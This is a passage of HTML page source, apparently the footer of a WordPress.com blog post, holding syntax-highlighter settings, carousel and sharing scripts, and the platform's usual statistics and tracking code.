				themecss.setAttribute( "type", "text/css" );
				themecss.setAttribute( "href", themecssurl );
		} else {
				themecss.rel = "stylesheet";
				themecss.href = themecssurl;
		}
		document.head.appendChild( themecss );
	})();
	SyntaxHighlighter.config.strings.expandSource = '+ expand source';
	SyntaxHighlighter.config.strings.help = '?';
	SyntaxHighlighter.config.strings.alert = 'SyntaxHighlighter\n\n';
	SyntaxHighlighter.config.strings.noBrush = 'Can\'t find brush for: ';
	SyntaxHighlighter.config.strings.brushNotHtmlScript = 'Brush wasn\'t configured for html-script option: ';
	SyntaxHighlighter.defaults['pad-line-numbers'] = false;
	SyntaxHighlighter.defaults['toolbar'] = false;
	SyntaxHighlighter.all();

	// Infinite scroll support
	if ( typeof( jQuery ) !== 'undefined' ) {
		jQuery( function( $ ) {
			$( document.body ).on( 'post-load', function() {
				SyntaxHighlighter.highlight();
			} );
		} );
	}
</script>
<link crossorigin='anonymous' rel='stylesheet' id='all-css-0-3' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/carousel/swiper-bundle.css,/wp-content/mu-plugins/carousel/jetpack-carousel.css?m=1630955947j&cssminify=yes' type='text/css' media='all' />
<script id='coblocks-lightbox-js-extra'>
var coblocksLigthboxData = {"closeLabel":"Close Gallery","leftLabel":"Previous","rightLabel":"Next"};
</script>
<script id='jetpack-carousel-js-extra'>
var jetpackSwiperLibraryPath = {"url":"\/wp-content\/mu-plugins\/carousel\/swiper-bundle.js"};
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/xorl.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"6657cd1006","display_exif":"0","display_comments":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/xorl.wordpress.com\/wp-login.php?redirect_to=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F","blog_id":"6013855","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"stats_query_args":"blog=6013855&v=wpcom&tz=3&user_id=0&subd=xorl","is_public":"1"};
</script>
<script id='sharing-js-js-extra'>
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
</script>
<script crossorigin='anonymous' type='text/javascript' src='https://s2.wp.com/_static/??-eJyNjUluwzAMRS9UinHcFPWi6FEKWWJs2poqSkmPHyGAgyILIytO7/HjNYGJoVAouAhaurCh9KcWecN/J18huTpxEHS8kuBvpUqzDtZRfoY30sTRRbMKHlX3qToQ9skRZLqoI1qWe+IGgeNpLmPci9bWc4BRZ/RaCuXWQcm62TuS0TlWIYcLldRY2BZ7QSuLpwK9OuAPB/NYnPMdti/kwTWZ6J/GHS9Faf+d5owy68xh2mqTvv1X93Ea+n4Y3vvlBkKRod8='></script>
<script type='text/javascript'>
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-facebook' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-twitter' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
						return false;
					}
				} );
			} )();
</script>
<script type="text/javascript">
// <![CDATA[
(function() {
try{
  if ( window.external &&'msIsSiteMode' in window.external) {
    if (window.external.msIsSiteMode()) {
      var jl = document.createElement('script');
      jl.type='text/javascript';
      jl.async=true;
      jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php';
      var s = document.getElementsByTagName('script')[0];
      s.parentNode.insertBefore(jl, s);
    }
  }
}catch(e){}
})();
// ]]>
</script>	<iframe src='https://widgets.wp.com/likes/master.html?ver=20220105#ver=20220105&amp;origin=https://xorl.wordpress.com' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'>
		<div class="likes-text">
			<span>%d</span> bloggers like this:		</div>
		<ul class="wpl-avatars sd-like-gravatars"></ul>
	</div>

		<script src="//stats.wp.com/w.js?63" defer></script> <script type="text/javascript">
_tkq = window._tkq || [];
_stq = window._stq || [];
_tkq.push(['storeContext', {'blog_id':'6013855','blog_tz':'3','user_lang':'en','blog_lang':'en','user_id':'0'}]);
_stq.push(['view', {'blog':'6013855','v':'wpcom','tz':'3','user_id':'0','post':'5412','subd':'xorl'}]);
_stq.push(['extra', {'crypt':'UE40eW5QN0p8M2Y/RE1mNzc2NTVTamdsd0xoLz9RQkM2K298TXY9bERQMXc2MjhEaVZfb2wwakRoSj0mUkp1THptM1NdbkV1WjZIcU9mVWQmPUIvMlN6Jk8wW3NYVEJ3dWZOWExuWD8uS19ubEkxV0lSbUVmTzlZUU1DQy5hJnFINz84OUlsQU1FeV9bK2J+cUVTOXNbaUdVJkguVUt+TytVcXA9cFtMV29tMDBEUUlTZjczRVNWSnctUGxwMW93ZzV4fmhkdU98ZDdNPWVlRl1WT0VXLVpYUnlqVz1DZHh5VXhJRGxhQ3FtSU1yW0JqdlhPSE0tM1FHd2pwJXU3dmVLPWhrVCthSGMwak13dWNmQkczJkF5bkJ6WTMwbUlvd2NbTzQuTmtwWGpOLixiRVFZJVU1YltUXW0sY1FpeDNVLUcyb1V5WUNZVkRb'}]);
_stq.push([ 'clickTrackerInit', '6013855', '5412' ]);
	</script>
<noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:1px;width:1px;overflow:hidden;position:absolute;bottom:1px;" alt="" /></noscript>
<script defer id="bilmur" data-customproperties="{&quot;logged_in&quot;:&quot;0&quot;,&quot;wptheme&quot;:&quot;pub\/journalist&quot;}" data-provider="wordpress.com" data-service="simple"  src="/wp-content/js/bilmur.min.js?i=3&m=202233"></script><script>
if ( 'object' === typeof wpcom_mobile_user_agent_info ) {

	wpcom_mobile_user_agent_info.init();
	var mobileStatsQueryString = "";
	
	if( false !== wpcom_mobile_user_agent_info.matchedPlatformName )
		mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName;
	
	if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName )
		mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName;
	
	if( wpcom_mobile_user_agent_info.isIPad() )
		mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views';

	if( "" != mobileStatsQueryString ) {
		new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random();
	}
	
}
</script>
</body>
</html>